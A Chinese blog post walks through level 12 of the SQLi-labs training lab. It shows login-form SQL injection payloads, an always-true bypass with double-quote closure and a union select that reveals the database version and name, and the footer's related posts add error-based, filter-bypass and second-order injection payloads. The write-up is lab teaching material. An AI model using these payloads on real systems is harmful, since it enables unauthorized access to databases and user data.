sqllab第十二关通关笔记

最新推荐文章于 2024-05-22 17:51:55 发布
最新推荐文章于 2024-05-22 17:51:55 发布
阅读量401 收藏 4
点赞数 2
文章标签: 笔记 sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_WORM/article/details/136717180
版权

知识点:

  • 一般字符型注入分类
    • 单引号闭合
    • 双引号闭合
  • 这是一个双引号闭合

看界面又是一个输入框的注入;通过admin admin进行登录发现页面还是有回显

直接使用万能密码尝试

构造payload:username=admin'or1=1

没有任何反应;可能是没加注释符的关闭

构造username=admin'or+1=1#

发现还是没有任何回显信息;第一反应是特殊字符过滤??;或许是单引号的问题

使用双引号试一下

构造payload:username=admin"or+1=1

发现有了报错信息;发现原始语句应该是where username=("输入内容") and passwd=

好好好;知道了原始语句就可以绕过了

构造payload:username=admin"+or+1=1#

页面成功打印出了用户信息

接下来尝试进行联合注入

构造payload:username=a"+union+select+1,2#

成功打印出了输入的信息

接下来获取对应数据库的版本信息和数据库名

构造payload:username=a"+union+select+version(),database()#

成功获取了数据库名和版本信息;

到这里就结束了;具体的敏感信息就不获取了,实际操作和第十一关一样

10

I_WORM
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DVWA 共12通关笔记
09-12
基本上都过来了。
愤怒的小鸟水煮蛋1-15通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15通关录像
sqllab第二十通关笔记
I_WORM的博客
03-15 356
仔细看了一下历史包才发现点击登录的过程中是发了两个包的,首先登录时会发一个不带cookie的包,之后会再发送一个带cookie的post包;上面拦截到的是不带cookie的包,所以回显没任何信息;构造payload:1'+or+extractvalue(1,concat(0x7e,database(),0x7e))#通过放包发现是一个302跳转的响应包,页面只有一个 I Love Cookies;通过点击页面上方的按钮可以实现响应包的自动跳转,跳转后的页面也没有任何信息。成功获取了数据库名;
sqllab第二十七通关笔记
I_WORM的博客
03-17 388
构造payload:id=1'%09and%09extractvalue(1,concat(0x7e,database(),0x7e))='1。构造payload:id=1'%09and%09exp(710)='1。经过不断的测试发现空格和+被过滤了,发现%09可以代替空格绕过检测。构造payload:id=1'%09and%091='1。页面给出了提示,联合查询键字被过滤了,直接使用错误注入。页面成功回显出了相信息,说明绕过成功。构造payload:id=1''成功获取到了数据库名;
sqllab第二十三通关笔记
I_WORM的博客
03-15 346
成功注入,说明这里的输入读取是mysql_fetch_array("select 1,2,3 from 表 where id ='输入内容'")构造payload:id=0'+union+select+1,version(),database()+'出现了语法错误的界面,发现好像利用了mysql_fetch_array()进行输入读取。构造payload:id=0'+union+select+1,2,3+'构造payload:id=0'+or+1='1。成功爆出了语法错误,说明读取输入用到了单引号。
sqllab第二十七A通关笔记
I_WORM的博客
03-17 281
构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1。构造payload:id=0"%09uNion%09SElect%091,2,3%09"1。构造payload:id=1"%09and%091="1。经过测试发现这是一个双引号闭合。成功获取了数据库名和版本信息。页面成功回显除了输入内容。获取数据库名和版本信息。
sqllab第二十一通关笔记
I_WORM的博客
03-15 272
构造payload:1') or extractvalue(1,concat(0x7e,database(),0x7e))#直接截取带有cookie的数据包,发现uname参数的值被加密了,%3d是等号,这应该是一个base64加密。base64加密:MScrb3IrMT0xIw==(可以再次进行url编码,=变为%3d;通过在线解码平台对数据进行解密发现是admin,这就对上了,确实是一个base64加密。根据得到的信息,重新构造payload:1')+or+1=1#感觉是没问题的,是不是+号的问题呢?
sqllab第二十八通关笔记(附带28a)
I_WORM的博客
03-17 275
构造payload:id=0%27)union%09all%09select%091,database(),3%09=(%271。重新构造payload:id=0%27)union%09all%09select%091,2,3%09and1=(%271。构造payload:id=-1%27)union%09all%09select%091,2,3%09and1=(%271。页面成功回显了,但是内容不是输入信息,应该是他把-1进行绝对值处理了,导致显示了id=1的内容。好,尝试进行错误注入。
sqllab第二十二通关笔记
I_WORM的博客
03-15 199
构造payload:1" or extractvalue(1,concat(0x7e,database(),0x7e))#出现了语法错误的报错信息,说明这里使用了双引号进行读取输入。base64加密:MSIgb3IgZXhwKDcxMCkj。出现了hacker的页面,说明信息错误但是单引号没起作用。构造payload:1" or exp(710)#测试这里使用什么手段读取输入。参数值被base64加密了。base64加密:MSc=base64加密:MSI=成功获取到了数据库名;构造payload:1"
sqllab第二十六通关笔记
I_WORM的博客
03-16 359
构造payload:id='||extractvalue(1,concat(0x7e,database(),0x7e))='1。发现不行,报错了,换成其他的也不行(%0a %09 %0b %0c %0d %a0)想了半天没结果,不用空格的话没办法执行语句;看了别人的wp发现可以用||进行绕过。构造payload:id=’||exp(710)='1。好了,既然能够绕过入门规则了,下面就要开始获取数据了。构造payload:id=1'+oorr+1='1。构造payload:id='||1='1。
sqllab第二十四通关笔记
I_WORM的博客
03-16 340
通过数据库来查看修改密码前和后的变化,发现ren账户的密码发生了改变,原账户密码没有发生任何改变。利用新注册的账户密码进行登录;成功登录进去了,界面是一个修改密码的界面。说明修改了ren账户的密码。查看界面发现是一个登录框,尝试进行登录框的注入发现这里不存在注入点。好了,利用修改后的密码进行登录,发现账户ren'# 登录失败。利用新注册的恶意账户进行登录;成功进入了修改密码的界面。通过点击注册,进入注册面板,注册一个新的账户。利用ren'# 账户修改了ren账户的密码。对该账户进行修改密码的操作。
松鼠大战1第G通关录像.mp4
09-16
松鼠大战1第G通关录像
松鼠大战1第F通关录像.mp4
09-15
松鼠大战1第F通关录像
松鼠大战1第E通关录像.mp4
09-14
松鼠大战1第E通关录像
k8s笔记 | 高度调度
weixin_41104307的博客
05-19 318
简介:在k8s中周期性运行计划任务,与linux中的crontab相同;注意点 CornJob执行的时间是controller-manager的时间,所以一定要确保controller-manager的时间是准确的,另外cornjob。
k8s笔记 | helm包管理
weixin_41104307的博客
05-19 305
如果是在 arm64下的话,使用 registry.cn-beijing.aliyuncs.com/pylixm/nfs-subdir-external-provisioner:v4.0.0 这个镜像会报错 exec / nfs-subdir-external-provisioner format error 简单来说就是平台不匹配,解决方案就是自己构建一个匹配的镜像包。由于需要提前创建storageClass manage-nfc-storage,在前面的章节中总共有三个文件。
LeetCode刷题笔记第1859题:将句子排序
qq_29787929的博客
05-17 184
通过空格切分句子为单词列表,根据最后每个单词的最后一个数字在新的列表中存入相对应的位置,返回按照新列表中的顺序拼接的句子。因为创建了一个新的列表,空间复杂度O(n)因为要遍历整个列表,时间复杂度O(n)
Vue学习笔记3——事件处理
最新发布
qq_44778824的博客
05-22 236
尽管我们可以直接在方法内调用,但如果方法能更专注于数据逻辑而不用去处理DOM事件的细节会更好。)来监听DOM事件,并在事件触发时执行对应的JavaScript。// 读取data里面数据的方法:this.count。// 所有方法或者函数都放在这里,跟data同级。为解决这一问题,Vue 为。对象和通过事件传递数据。
upload-labs19通关
07-28
5. 完成以上步骤后,即可成功通关第19。 以上是通关upload-labs第19的方法。根据引用\[2\]中的内容,这些方法在实战中可能会有所不同,但基本原理是相似的。希望这些方法能对你的学习有所帮助。 #### 引用[....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值